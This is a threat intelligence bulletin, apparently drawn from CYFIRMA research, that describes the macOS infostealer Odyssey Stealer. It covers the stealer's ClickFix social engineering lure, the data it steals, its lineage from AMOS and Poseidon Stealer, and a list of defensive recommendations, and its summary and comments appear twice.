Odyssey Stealer: The Rebrand of Poseidon Stealer
Summary:
A formidable threat, Odyssey Stealer (rebranded from Poseidon Stealer, which was forked from AMOS Stealer), has emerged within the macOS-targeting malware landscape, specifically targeting users in Western nations while avoiding CIS nations, through highly deceptive social engineering tactics. Leveraging fake App Store prompts and expertly crafted typosquatted domains, Odyssey Stealer employs a "Clickfix" technique to trick users into executing malicious AppleScripts. This sophisticated infostealer is designed to surreptitiously exfiltrate a comprehensive array of sensitive data, including browser cookies, password credentials, cryptocurrency wallet keys, private keys, session tokens, and various common document types. It achieves this by displaying fake password prompts, copying macOS keychain files, and targeting popular cryptocurrency wallet applications and browser extensions. The stolen data is then meticulously zipped and exfiltrated to a C2 server, with built-in retry mechanisms for persistence. Operated via a sophisticated web-based command-and-control panel, Odyssey Stealer is a direct descendant of AMOS Stealer, representing a continuous evolution in macOS-specific MaaS offerings, with its author, "Rodrigo," reportedly still actively involved.
Security Officer Comments:
The discovery of campaigns utilizing Odyssey Stealer signifies a notable increase in the sophistication and targeting of macOS malware. Its reliance on human-factor vulnerabilities through "Clickfix" social engineering, particularly the instruction to paste terminal commands from seemingly legitimate CAPTCHA pages, highlights the persistent efficacy of user manipulation in breaching security perimeters. The breadth of data exfiltration, encompassing not only standard credentials but also cryptocurrency wallet files, seed phrases, and session tokens, clearly indicates a financially motivated actor with a highly focused target demographic. The avoidance of victims in CIS nations underscores the likelihood of this malware being associated with Russia-aligned threat groups. The re-emergence of codebases from AMOS Stealer and the suspected continued involvement of "Rodrigo" points to a maturing macOS malware-as-a-service ecosystem where established developers are continuously iterating and rebranding their offerings with enhanced capabilities. This professionalization, exhibited by the advanced C2 panel capabilities like "Google Cookies Restore," underscores their shift from opportunistic attacks to well-orchestrated and well-resourced long-term espionage campaigns.
Suggested Corrections:
IOCs are available here.
CYFIRMA recommendations:
https://www.cyfirma.com/research/odyssey-stealer-the-rebrand-of-poseidon-stealer/
A formidable threat, Odyssey Stealer (rebranded from Poseidon Stealer, which was forked from AMOS Stealer), has emerged within the macOS-targeting malware landscape, specifically targeting users in Western nations while avoiding CIS nations, through highly deceptive social engineering tactics. Leveraging fake App Store prompts and expertly crafted typosquatted domains, Odyssey Stealer employs a "Clickfix" technique to trick users into executing malicious AppleScripts. This sophisticated infostealer is designed to surreptitiously exfiltrate a comprehensive array of sensitive data, including browser cookies, password credentials, cryptocurrency wallet keys, private keys, session tokens, and various common document types. It achieves this by displaying fake password prompts, copying macOS keychain files, and targeting popular cryptocurrency wallet applications and browser extensions. The stolen data is then meticulously zipped and exfiltrated to a C2 server, with built-in retry mechanisms for persistence. Operated via a sophisticated web-based command-and-control panel, Odyssey Stealer is a direct descendant of AMOS Stealer, representing a continuous evolution in macOS-specific MaaS offerings, with its author, "Rodrigo," reportedly still actively involved.
Security Officer Comments:
The discovery of campaigns utilizing Odyssey Stealer signifies a notable increase in the sophistication and targeting of macOS malware. Its reliance on human-factor vulnerabilities through "Clickfix" social engineering, particularly the instruction to paste terminal commands from seemingly legitimate CAPTCHA pages, highlights the persistent efficacy of user manipulation in breaching security perimeters. The breadth of data exfiltration, encompassing not only standard credentials but also cryptocurrency wallet files, seed phrases, and session tokens, clearly indicates a financially motivated actor with a highly focused target demographic. The avoidance of victims in CIS nations underscores the likelihood of this malware being associated with Russia-aligned threat groups. The re-emergence of codebases from AMOS Stealer and the suspected continued involvement of "Rodrigo" points to a maturing macOS malware-as-a-service ecosystem where established developers are continuously iterating and rebranding their offerings with enhanced capabilities. This professionalization, exhibited by the advanced C2 panel capabilities like "Google Cookies Restore," underscores their shift from opportunistic attacks to well-orchestrated and well-resourced long-term espionage campaigns.
Suggested Corrections:
IOCs are available here.
CYFIRMA recommendations:
- Implement threat intelligence to proactively counter the threats associated with the Odyssey stealer.
- To protect the endpoints, use robust endpoint security solutions for real-time monitoring and threat detection, such as an Anti-malware security suite and a host-based intrusion prevention system.
- Continuous monitoring of the network activity with NIDS/NIPS and using the web application firewall to filter/block suspicious activity provides comprehensive protection from compromise due to encrypted payloads.
- Configure firewalls to block outbound communication to known malicious IP addresses and domains associated with Odyssey stealer command and control servers.
- Implement behavior-based monitoring to detect unusual activity patterns, such as suspicious processes attempting to make unauthorized network connections.
- Employ application whitelisting to allow only approved applications to run on endpoints, preventing the execution of unauthorized or malicious executables.
- Only install apps from the official Mac App Store or verified developer sites.
- Block osascript execution unless explicitly required for business operations.
- The use of security benchmarks to create baseline security procedures and organizational security policies is also recommended.
- Develop a comprehensive incident response plan that outlines steps to take in case of a malware infection, including isolating affected systems and notifying relevant stakeholders.
- Security awareness and training programs help to protect from security incidents such as social engineering attacks. Organizations should remain vigilant and continuously adapt their defenses to mitigate the evolving threats posed by the Odyssey Stealer malware.
https://www.cyfirma.com/research/odyssey-stealer-the-rebrand-of-poseidon-stealer/